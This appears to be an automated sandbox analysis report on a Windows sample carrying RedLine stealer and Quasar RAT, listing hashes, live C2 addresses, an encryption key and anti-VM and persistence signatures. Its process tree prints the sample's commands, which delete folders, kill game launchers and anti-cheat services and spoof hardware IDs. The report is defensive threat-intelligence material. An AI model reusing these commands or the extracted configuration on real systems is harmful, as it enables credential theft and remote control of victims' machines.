Overview
overview
10Static
static
33B6F8FE872...A9.exe
windows10-ltsc_2021-x64
103B6F8FE872...A9.exe
windows10-2004-x64
103B6F8FE872...A9.exe
windows10-ltsc_2021-x64
103B6F8FE872...A9.exe
windows11-21h2-x64
103B6F8FE872...A9.exe
android-11-x64
3B6F8FE872...A9.exe
android-13-x64
3B6F8FE872...A9.exe
macos-10.15-amd64
3B6F8FE872...A9.exe
ubuntu-18.04-amd64
3B6F8FE872...A9.exe
debian-9-armhf
3B6F8FE872...A9.exe
debian-9-mips
3B6F8FE872...A9.exe
debian-9-mipsel
Resubmissions
31/03/2025, 16:47
250331-vak21atwcy 1031/03/2025, 16:04
250331-thy36as1es 1031/03/2022, 10:22
220331-md8cpsada5 10Analysis
-
max time kernel
12s -
max time network
66s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
31/03/2025, 16:04
Static task
static1
Behavioral task
behavioral1
Sample
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral2
Sample
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral3
Sample
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral4
Sample
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Resource
win11-20250313-en
Behavioral task
behavioral5
Sample
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Resource
android-x64-arm64-20240910-en
Behavioral task
behavioral6
Sample
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Resource
android-33-x64-arm64-20240910-en
Behavioral task
behavioral7
Sample
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Resource
macos-20241106-en
Behavioral task
behavioral8
Sample
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral9
Sample
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral10
Sample
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral11
Sample
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Resource
debian9-mipsel-20240226-en
General
-
Target
3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
-
Size
3.6MB
-
MD5
cf56adaf1236aa52a98723c8aa61ff84
-
SHA1
00a517dfa5a9294f5619a7a1d8d0181966692768
-
SHA256
3b6f8fe87241a3af1ff1414c5223a20b97f2bb2b7b7a9cb574077e253fb6db88
-
SHA512
2ef67cad31b4792fe066c2cd2f8a745493cf6bd1cab055e689ffa02bb8ec656746f28d06ae0dd6a4a88043c35ac7cf5cc18c3165e81959ef6b6d87ca12a9742b
-
SSDEEP
98304:k5a7Zy+b1yCgWYdhz/tH3ILijJxeWB/5izLurIBQPZJCj:kKA+QWQhLF3ILqJx0zLuL2
Malware Config
Extracted
redline
cheat
85.215.222.129:43240
Extracted
quasar
2.8.0.1
Images.exe
85.215.222.129:65535
G8fgKgmsR7tqiTolCN
-
encryption_key
SLsfHXfM5GTIubFvF50I
-
install_name
Images.exe
-
log_directory
FiveM_Logs
-
reconnect_delay
3000
-
startup_key
Venom Client Startup
Signatures
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x00080000000281e5-17.dat family_quasar behavioral1/memory/4424-47-0x0000000000080000-0x000000000016C000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral1/files/0x00080000000281e6-39.dat family_redline behavioral1/memory/5944-48-0x0000000000FD0000-0x0000000000FEE000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral1/files/0x00080000000281e6-39.dat family_sectoprat behavioral1/memory/5944-48-0x0000000000FD0000-0x0000000000FEE000-memory.dmp family_sectoprat -
Sectoprat family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Hsjdosj.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Hsjdosj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Hsjdosj.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation 3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation Gptmvmjkvvg.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation Images.exe Key value queried \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 9 IoCs
pid Process 4372 Hsjdosj.exe 4424 Gptmvmjkvvg.exe 5944 Oajujxo.exe 3784 Images.exe 3244 Gptmvmjkvvg.exe 4580 Images.exe 3336 Images.exe 6104 Images.exe 2236 Images.exe -
resource yara_rule behavioral1/files/0x0008000000025e04-7.dat themida behavioral1/memory/4372-24-0x00007FF6B6690000-0x00007FF6B6E67000-memory.dmp themida behavioral1/memory/4372-50-0x00007FF6B6690000-0x00007FF6B6E67000-memory.dmp themida behavioral1/memory/4372-49-0x00007FF6B6690000-0x00007FF6B6E67000-memory.dmp themida behavioral1/memory/4372-57-0x00007FF6B6690000-0x00007FF6B6E67000-memory.dmp themida behavioral1/memory/4372-101-0x00007FF6B6690000-0x00007FF6B6E67000-memory.dmp themida -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Venom Client Startup = "C:\\Windows\\SysWOW64\\Images.exe" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Venom Client Startup = "C:\\Windows\\SysWOW64\\Images.exe" WScript.exe -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Hsjdosj.exe -
pid Process 3208 powershell.exe 4396 powershell.exe 5468 powershell.exe 1172 powershell.exe 5668 powershell.exe 3052 powershell.exe 4928 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 24 raw.githubusercontent.com 25 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 ip-api.com -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\SysWOW64\Images.exe Gptmvmjkvvg.exe File opened for modification C:\Windows\SysWOW64\Images.exe Gptmvmjkvvg.exe File opened for modification C:\Windows\SysWOW64\Images.exe Images.exe File opened for modification C:\Windows\SysWOW64\Images.exe WScript.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4372 Hsjdosj.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Images.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Images.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Images.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Oajujxo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Images.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gptmvmjkvvg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Images.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gptmvmjkvvg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4584 cmd.exe 824 cmd.exe 4756 PING.EXE -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier reg.exe Set value (str) \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "Apple-23059-16299-295987873" reg.exe Key created \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct reg.exe Set value (str) \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct = "Apple-23055555011734" reg.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 1088 ipconfig.exe 5624 ipconfig.exe -
Kills process with taskkill 11 IoCs
pid Process 1056 taskkill.exe 2556 taskkill.exe 2416 taskkill.exe 5284 taskkill.exe 416 taskkill.exe 1044 taskkill.exe 5776 taskkill.exe 1508 taskkill.exe 4948 taskkill.exe 2712 taskkill.exe 3456 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000_Classes\Interface\ClsidStore = 0230655028325592323231078962429702342331316296021782623189 reg.exe Key created \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000_Classes\Local Settings Images.exe Key created \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ WScript.exe Key created \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000_Classes\Interface reg.exe -
Modifies registry key 1 TTPs 64 IoCs
pid Process 2572 reg.exe 5420 reg.exe 2064 reg.exe 4352 reg.exe 4992 reg.exe 3844 reg.exe 3696 reg.exe 1564 reg.exe 3068 reg.exe 1800 reg.exe 3884 reg.exe 4216 reg.exe 4824 reg.exe 1640 reg.exe 3604 reg.exe 1032 reg.exe 4744 reg.exe 4664 reg.exe 5940 reg.exe 5920 reg.exe 4736 reg.exe 1512 reg.exe 6100 reg.exe 3608 reg.exe 3464 reg.exe 1984 reg.exe 3372 reg.exe 4432 reg.exe 5896 reg.exe 3804 reg.exe 4808 reg.exe 3688 reg.exe 4604 reg.exe 1560 reg.exe 2576 reg.exe 5160 reg.exe 4588 reg.exe 1048 reg.exe 5360 reg.exe 2792 reg.exe 3696 reg.exe 6120 reg.exe 5648 reg.exe 3848 reg.exe 1560 reg.exe 640 reg.exe 4488 reg.exe 4120 reg.exe 5432 reg.exe 5432 reg.exe 2500 reg.exe 3888 reg.exe 5264 reg.exe 5200 reg.exe 3440 reg.exe 3740 reg.exe 5612 reg.exe 5988 reg.exe 2056 reg.exe 2280 reg.exe 228 reg.exe 2104 reg.exe 2632 reg.exe 384 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4756 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4832 schtasks.exe 5224 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe 3784 Images.exe -
Suspicious use of AdjustPrivilegeToken 52 IoCs
description pid Process Token: SeDebugPrivilege 5944 Oajujxo.exe Token: SeDebugPrivilege 4424 Gptmvmjkvvg.exe Token: SeDebugPrivilege 4948 taskkill.exe Token: SeDebugPrivilege 2712 taskkill.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeSecurityPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeSecurityPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeSecurityPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeSecurityPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeSecurityPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeSecurityPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeSecurityPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeSecurityPrivilege 4424 Gptmvmjkvvg.exe Token: SeSecurityPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeSecurityPrivilege 4424 Gptmvmjkvvg.exe Token: SeDebugPrivilege 3456 taskkill.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeSecurityPrivilege 4424 Gptmvmjkvvg.exe Token: SeBackupPrivilege 4424 Gptmvmjkvvg.exe Token: SeDebugPrivilege 1044 taskkill.exe Token: SeDebugPrivilege 1056 taskkill.exe Token: SeDebugPrivilege 3784 Images.exe Token: SeDebugPrivilege 2556 taskkill.exe Token: SeDebugPrivilege 2416 taskkill.exe Token: SeDebugPrivilege 5776 taskkill.exe Token: SeDebugPrivilege 3784 Images.exe Token: SeDebugPrivilege 5284 taskkill.exe Token: SeDebugPrivilege 416 taskkill.exe Token: SeDebugPrivilege 1508 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3784 Images.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4124 wrote to memory of 4372 4124 3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe 81 PID 4124 wrote to memory of 4372 4124 3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe 81 PID 4124 wrote to memory of 4424 4124 3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe 83 PID 4124 wrote to memory of 4424 4124 3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe 83 PID 4124 wrote to memory of 4424 4124 3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe 83 PID 4124 wrote to memory of 5944 4124 3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe 84 PID 4124 wrote to memory of 5944 4124 3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe 84 PID 4124 wrote to memory of 5944 4124 3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe 84 PID 4372 wrote to memory of 5468 4372 Hsjdosj.exe 86 PID 4372 wrote to memory of 5468 4372 Hsjdosj.exe 86 PID 4372 wrote to memory of 476 4372 Hsjdosj.exe 87 PID 4372 wrote to memory of 476 4372 Hsjdosj.exe 87 PID 4372 wrote to memory of 1172 4372 Hsjdosj.exe 88 PID 4372 wrote to memory of 1172 4372 Hsjdosj.exe 88 PID 4372 wrote to memory of 3632 4372 Hsjdosj.exe 89 PID 4372 wrote to memory of 3632 4372 Hsjdosj.exe 89 PID 4372 wrote to memory of 4920 4372 Hsjdosj.exe 91 PID 4372 wrote to memory of 4920 4372 Hsjdosj.exe 91 PID 4920 wrote to memory of 4948 4920 cmd.exe 92 PID 4920 wrote to memory of 4948 4920 cmd.exe 92 PID 4424 wrote to memory of 4832 4424 Gptmvmjkvvg.exe 93 PID 4424 wrote to memory of 4832 4424 Gptmvmjkvvg.exe 93 PID 4424 wrote to memory of 4832 4424 Gptmvmjkvvg.exe 93 PID 4372 wrote to memory of 4824 4372 Hsjdosj.exe 210 PID 4372 wrote to memory of 4824 4372 Hsjdosj.exe 210 PID 4824 wrote to memory of 2712 4824 cmd.exe 96 PID 4824 wrote to memory of 2712 4824 cmd.exe 96 PID 4424 wrote to memory of 3784 4424 Gptmvmjkvvg.exe 97 PID 4424 wrote to memory of 3784 4424 Gptmvmjkvvg.exe 97 PID 4424 wrote to memory of 3784 4424 Gptmvmjkvvg.exe 97 PID 4372 wrote to memory of 824 4372 Hsjdosj.exe 98 PID 4372 wrote to memory of 824 4372 Hsjdosj.exe 98 PID 824 wrote to memory of 3456 824 cmd.exe 99 PID 824 wrote to memory of 3456 824 cmd.exe 99 PID 4372 wrote to memory of 5112 4372 Hsjdosj.exe 100 PID 4372 wrote to memory of 5112 4372 Hsjdosj.exe 100 PID 5112 wrote to memory of 1044 5112 cmd.exe 214 PID 5112 wrote to memory of 1044 5112 cmd.exe 214 PID 4372 wrote to memory of 5036 4372 Hsjdosj.exe 102 PID 4372 wrote to memory of 5036 4372 Hsjdosj.exe 102 PID 5036 wrote to memory of 1056 5036 cmd.exe 103 PID 5036 wrote to memory of 1056 5036 cmd.exe 103 PID 4424 wrote to memory of 3680 4424 Gptmvmjkvvg.exe 104 PID 4424 wrote to memory of 3680 4424 Gptmvmjkvvg.exe 104 PID 4424 wrote to memory of 3680 4424 Gptmvmjkvvg.exe 104 PID 4372 wrote to memory of 3828 4372 Hsjdosj.exe 229 PID 4372 wrote to memory of 3828 4372 Hsjdosj.exe 229 PID 3828 wrote to memory of 2556 3828 cmd.exe 107 PID 3828 wrote to memory of 2556 3828 cmd.exe 107 PID 3680 wrote to memory of 2816 3680 cmd.exe 108 PID 3680 wrote to memory of 2816 3680 cmd.exe 108 PID 3680 wrote to memory of 2816 3680 cmd.exe 108 PID 4372 wrote to memory of 3932 4372 Hsjdosj.exe 109 PID 4372 wrote to memory of 3932 4372 Hsjdosj.exe 109 PID 3680 wrote to memory of 4756 3680 cmd.exe 230 PID 3680 wrote to memory of 4756 3680 cmd.exe 230 PID 3680 wrote to memory of 4756 3680 cmd.exe 230 PID 3932 wrote to memory of 2416 3932 cmd.exe 111 PID 3932 wrote to memory of 2416 3932 cmd.exe 111 PID 3680 wrote to memory of 3244 3680 cmd.exe 112 PID 3680 wrote to memory of 3244 3680 cmd.exe 112 PID 3680 wrote to memory of 3244 3680 cmd.exe 112 PID 3784 wrote to memory of 5224 3784 Images.exe 113 PID 3784 wrote to memory of 5224 3784 Images.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exeC:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe bcdedit /c set shutdown /r readonly /f force /t 21⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4124 -
C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe"C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Color 0b3⤵PID:5468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp3⤵PID:476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat3⤵PID:1172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:3632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im steam.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\system32\taskkill.exetaskkill /f /im steam.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\system32\taskkill.exetaskkill /f /im FortniteClient-Win64-Shipping.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe3⤵
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\system32\taskkill.exetaskkill /f /im OneDrive.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵PID:5432
-
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵PID:2740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵PID:2500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵PID:5956
-
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵PID:3388
-
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵PID:1088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe3⤵PID:956
-
C:\Windows\system32\taskkill.exetaskkill /f /im EpicGamesLauncher.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f3⤵PID:1668
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f4⤵PID:1260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f3⤵PID:4004
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f4⤵
- Modifies registry key
PID:3740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f3⤵PID:1380
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f4⤵
- Modifies registry key
PID:2280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f3⤵PID:4464
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-23052 /f4⤵
- Modifies registry key
PID:228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f3⤵PID:2392
-
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-23055 /f4⤵
- Modifies registry key
PID:2104
-
-
-
